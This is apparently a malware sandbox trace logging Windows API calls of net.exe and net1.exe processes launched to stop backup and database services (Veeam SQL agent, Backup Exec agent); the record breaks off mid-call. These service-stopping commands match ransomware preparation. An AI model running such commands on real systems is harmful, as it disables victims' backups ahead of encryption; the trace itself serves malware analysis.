Process: id = "236" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x9312000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 409 os_tid = 0x5e4 Process: id = "237" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x24997000" os_pid = "0x5a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "236" os_parent_pid = "0x6f4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 410 os_tid = 0x204 [0206.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2fff10 | out: lpSystemTimeAsFileTime=0x2fff10*(dwLowDateTime=0x44367960, dwHighDateTime=0x1d57a87)) [0206.400] GetCurrentProcessId () returned 0x5a4 [0206.400] GetCurrentThreadId () returned 0x204 [0206.400] GetTickCount () returned 0x116d356 [0206.400] QueryPerformanceCounter (in: lpPerformanceCount=0x2fff08 | out: lpPerformanceCount=0x2fff08*=32668477139) returned 1 [0206.400] GetModuleHandleA (lpModuleName=0x0) returned 0xfe0000 [0206.400] __set_app_type (_Type=0x1) [0206.400] __p__fmode () returned 0x74eb31f4 [0206.401] __p__commode () returned 0x74eb31fc [0206.401] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfeffe6) returned 0x0 [0206.401] __getmainargs (in: _Argc=0xff9064, _Argv=0xff906c, _Env=0xff9068, _DoWildCard=0, _StartInfo=0xff9024 | out: _Argc=0xff9064, _Argv=0xff906c, _Env=0xff9068) returned 0 [0206.401] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.401] GetConsoleOutputCP () returned 0x1b5 [0206.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9080 | out: lpCPInfo=0xff9080) returned 1 [0206.401] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.404] sprintf_s (in: _DstBuf=0x2ffec8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.404] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.406] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.406] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0206.406] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ffc94, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.406] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x82) returned 0x374bf8 [0206.407] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.407] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffe98 | out: Buffer=0x2ffe98*=0x371c90) returned 0x0 [0206.407] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffe98 | out: Buffer=0x2ffe98*=0x371ca8) returned 0x0 [0206.407] _fileno (_File=0x74eb2900) returned -2 [0206.407] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.407] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.407] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.407] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.407] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.407] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.407] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.407] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.407] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.407] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.407] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.407] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.407] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.407] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.407] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.407] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.407] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.407] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.408] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.408] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.408] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.408] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.408] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0206.408] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0206.408] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0206.408] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0206.408] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0206.408] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0206.408] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0206.408] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.408] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.408] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0206.408] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0206.408] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0206.408] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0206.408] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.408] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.408] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.408] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2008R2") returned -9 [0206.408] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0206.408] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0206.408] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0206.408] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0206.408] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0206.408] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0206.408] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0206.408] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0206.408] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0206.408] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0206.408] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0206.408] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0206.408] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0206.408] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0206.408] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0206.408] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0206.408] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0206.408] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0206.409] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0206.409] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -15 [0206.409] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0206.409] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0206.409] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2008R2") returned 5 [0206.409] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0206.409] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0206.409] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0206.409] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0206.409] _wcsupr (in: _String="SQLAgent$VEEAMSQL2008R2" | out: _String="SQLAGENT$VEEAMSQL2008R2") returned="SQLAGENT$VEEAMSQL2008R2" [0206.409] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3754d0 [0206.411] GetServiceKeyNameW (in: hSCManager=0x3754d0, lpDisplayName="SQLAGENT$VEEAMSQL2008R2", lpServiceName=0xffaaf0, lpcchBuffer=0x2ffe34 | out: lpServiceName="", lpcchBuffer=0x2ffe34) returned 0 [0206.412] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0206.412] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0206.412] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0206.412] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0206.412] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0206.412] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0206.412] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0206.412] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0206.412] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0206.412] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0206.412] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -3 [0206.412] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -15 [0206.412] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0206.412] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2008R2") returned -12 [0206.412] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2008R2") returned 5 [0206.412] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2008R2") returned 1 [0206.412] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0206.412] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2008R2") returned -18 [0206.412] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2008R2") returned -5 [0206.413] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x2ffe30 | out: bufptr=0x2ffe30) returned 0x889 [0206.413] wcscpy_s (in: _Destination=0xffa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.413] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0206.414] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb338, nSize=0x800, Arguments=0xff9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.415] GetFileType (hFile=0x26c) returned 0x3 [0206.415] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x373ca0 [0206.415] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x373ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0206.415] WriteFile (in: hFile=0x26c, lpBuffer=0x373ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ffd70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffd70, lpOverlapped=0x0) returned 0 [0206.415] LocalFree (hMem=0x373ca0) returned 0x0 [0206.415] GetFileType (hFile=0x26c) returned 0x3 [0206.415] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x376298 [0206.416] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x376298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0206.416] WriteFile (in: hFile=0x26c, lpBuffer=0x376298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffd70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffd70, lpOverlapped=0x0) returned 0 [0206.416] LocalFree (hMem=0x376298) returned 0x0 [0206.416] _ultow (in: _Dest=0x889, _Radix=3145120 | out: _Dest=0x889) returned="2185" [0206.416] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb338, nSize=0x800, Arguments=0xff9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.416] GetFileType (hFile=0x26c) returned 0x3 [0206.416] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x376298 [0206.416] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x376298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.416] WriteFile (in: hFile=0x26c, lpBuffer=0x376298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ffd7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffd7c, lpOverlapped=0x0) returned 0 [0206.416] LocalFree (hMem=0x376298) returned 0x0 [0206.416] GetFileType (hFile=0x26c) returned 0x3 [0206.416] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x376298 [0206.416] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x376298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n7", lpUsedDefaultChar=0x0) returned 2 [0206.416] WriteFile (in: hFile=0x26c, lpBuffer=0x376298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffd7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffd7c, lpOverlapped=0x0) returned 0 [0206.416] LocalFree (hMem=0x376298) returned 0x0 [0206.417] NetApiBufferFree (Buffer=0x371c90) returned 0x0 [0206.417] NetApiBufferFree (Buffer=0x371ca8) returned 0x0 [0206.417] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0206.417] exit (_Code=2) Process: id = "238" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4d117000" os_pid = "0x7f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 411 os_tid = 0x734 Process: id = "239" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b24b000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "238" os_parent_pid = "0x7f0" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 412 os_tid = 0x6e4 [0206.550] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfa90 | out: lpSystemTimeAsFileTime=0x2bfa90*(dwLowDateTime=0x444e4720, dwHighDateTime=0x1d57a87)) [0206.550] GetCurrentProcessId () returned 0x90 [0206.550] GetCurrentThreadId () returned 0x6e4 [0206.550] GetTickCount () returned 0x116d3f2 [0206.550] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfa88 | out: lpPerformanceCount=0x2bfa88*=32683464541) returned 1 [0206.550] GetModuleHandleA (lpModuleName=0x0) returned 0x730000 [0206.550] __set_app_type (_Type=0x1) [0206.550] __p__fmode () returned 0x74eb31f4 [0206.550] __p__commode () returned 0x74eb31fc [0206.551] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x73ffe6) returned 0x0 [0206.551] __getmainargs (in: _Argc=0x749064, _Argv=0x74906c, _Env=0x749068, _DoWildCard=0, _StartInfo=0x749024 | out: _Argc=0x749064, _Argv=0x74906c, _Env=0x749068) returned 0 [0206.551] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.551] GetConsoleOutputCP () returned 0x1b5 [0206.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x749080 | out: lpCPInfo=0x749080) returned 1 [0206.551] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.554] sprintf_s (in: _DstBuf=0x2bfa48, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.554] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.556] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.556] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0206.556] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf814, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.556] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x80) returned 0x574bf8 [0206.557] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.557] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfa18 | out: Buffer=0x2bfa18*=0x571c90) returned 0x0 [0206.557] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfa18 | out: Buffer=0x2bfa18*=0x571ca8) returned 0x0 [0206.557] _fileno (_File=0x74eb2900) returned -2 [0206.557] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.557] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.557] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.557] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.557] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.557] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.557] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.557] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.557] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.557] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.557] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.557] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.557] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.557] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.557] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.557] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.557] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.557] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.557] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.557] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.557] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.558] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.558] _wcsicmp (_String1="accounts", _String2="BackupExecAgentBrowser") returned -1 [0206.558] _wcsicmp (_String1="computer", _String2="BackupExecAgentBrowser") returned 1 [0206.558] _wcsicmp (_String1="config", _String2="BackupExecAgentBrowser") returned 1 [0206.558] _wcsicmp (_String1="continue", _String2="BackupExecAgentBrowser") returned 1 [0206.558] _wcsicmp (_String1="cont", _String2="BackupExecAgentBrowser") returned 1 [0206.558] _wcsicmp (_String1="file", _String2="BackupExecAgentBrowser") returned 4 [0206.558] _wcsicmp (_String1="files", _String2="BackupExecAgentBrowser") returned 4 [0206.558] _wcsicmp (_String1="group", _String2="BackupExecAgentBrowser") returned 5 [0206.558] _wcsicmp (_String1="groups", _String2="BackupExecAgentBrowser") returned 5 [0206.558] _wcsicmp (_String1="help", _String2="BackupExecAgentBrowser") returned 6 [0206.558] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentBrowser") returned 6 [0206.558] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentBrowser") returned 10 [0206.558] _wcsicmp (_String1="pause", _String2="BackupExecAgentBrowser") returned 14 [0206.558] _wcsicmp (_String1="session", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="sessions", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="sess", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="share", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="start", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="stats", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="statistics", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="stop", _String2="BackupExecAgentBrowser") returned 17 [0206.558] _wcsicmp (_String1="time", _String2="BackupExecAgentBrowser") returned 18 [0206.558] _wcsicmp (_String1="user", _String2="BackupExecAgentBrowser") returned 19 [0206.558] _wcsicmp (_String1="users", _String2="BackupExecAgentBrowser") returned 19 [0206.558] _wcsicmp (_String1="msg", _String2="BackupExecAgentBrowser") returned 11 [0206.558] _wcsicmp (_String1="messenger", _String2="BackupExecAgentBrowser") returned 11 [0206.558] _wcsicmp (_String1="receiver", _String2="BackupExecAgentBrowser") returned 16 [0206.558] _wcsicmp (_String1="rcv", _String2="BackupExecAgentBrowser") returned 16 [0206.558] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentBrowser") returned 12 [0206.558] _wcsicmp (_String1="redirector", _String2="BackupExecAgentBrowser") returned 16 [0206.558] _wcsicmp (_String1="redir", _String2="BackupExecAgentBrowser") returned 16 [0206.558] _wcsicmp (_String1="rdr", _String2="BackupExecAgentBrowser") returned 16 [0206.558] _wcsicmp (_String1="workstation", _String2="BackupExecAgentBrowser") returned 21 [0206.558] _wcsicmp (_String1="work", _String2="BackupExecAgentBrowser") returned 21 [0206.558] _wcsicmp (_String1="wksta", _String2="BackupExecAgentBrowser") returned 21 [0206.558] _wcsicmp (_String1="prdr", _String2="BackupExecAgentBrowser") returned 14 [0206.558] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentBrowser") returned 2 [0206.559] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentBrowser") returned 10 [0206.559] _wcsicmp (_String1="server", _String2="BackupExecAgentBrowser") returned 17 [0206.559] _wcsicmp (_String1="svr", _String2="BackupExecAgentBrowser") returned 17 [0206.559] _wcsicmp (_String1="srv", _String2="BackupExecAgentBrowser") returned 17 [0206.559] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentBrowser") returned 10 [0206.559] _wcsicmp (_String1="alerter", _String2="BackupExecAgentBrowser") returned -1 [0206.559] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentBrowser") returned 12 [0206.559] _wcsupr (in: _String="BackupExecAgentBrowser" | out: _String="BACKUPEXECAGENTBROWSER") returned="BACKUPEXECAGENTBROWSER" [0206.559] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5754c8 [0206.561] GetServiceKeyNameW (in: hSCManager=0x5754c8, lpDisplayName="BACKUPEXECAGENTBROWSER", lpServiceName=0x74aaf0, lpcchBuffer=0x2bf9b4 | out: lpServiceName="", lpcchBuffer=0x2bf9b4) returned 0 [0206.562] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0206.562] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0206.562] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0206.562] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0206.562] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0206.562] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0206.562] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0206.562] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0206.562] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0206.562] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0206.562] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTBROWSER") returned 14 [0206.562] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTBROWSER") returned 2 [0206.562] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0206.562] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0206.562] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0206.562] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0206.562] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0206.562] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTBROWSER") returned -1 [0206.562] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTBROWSER") returned 12 [0206.563] NetServiceControl (in: servername=0x0, 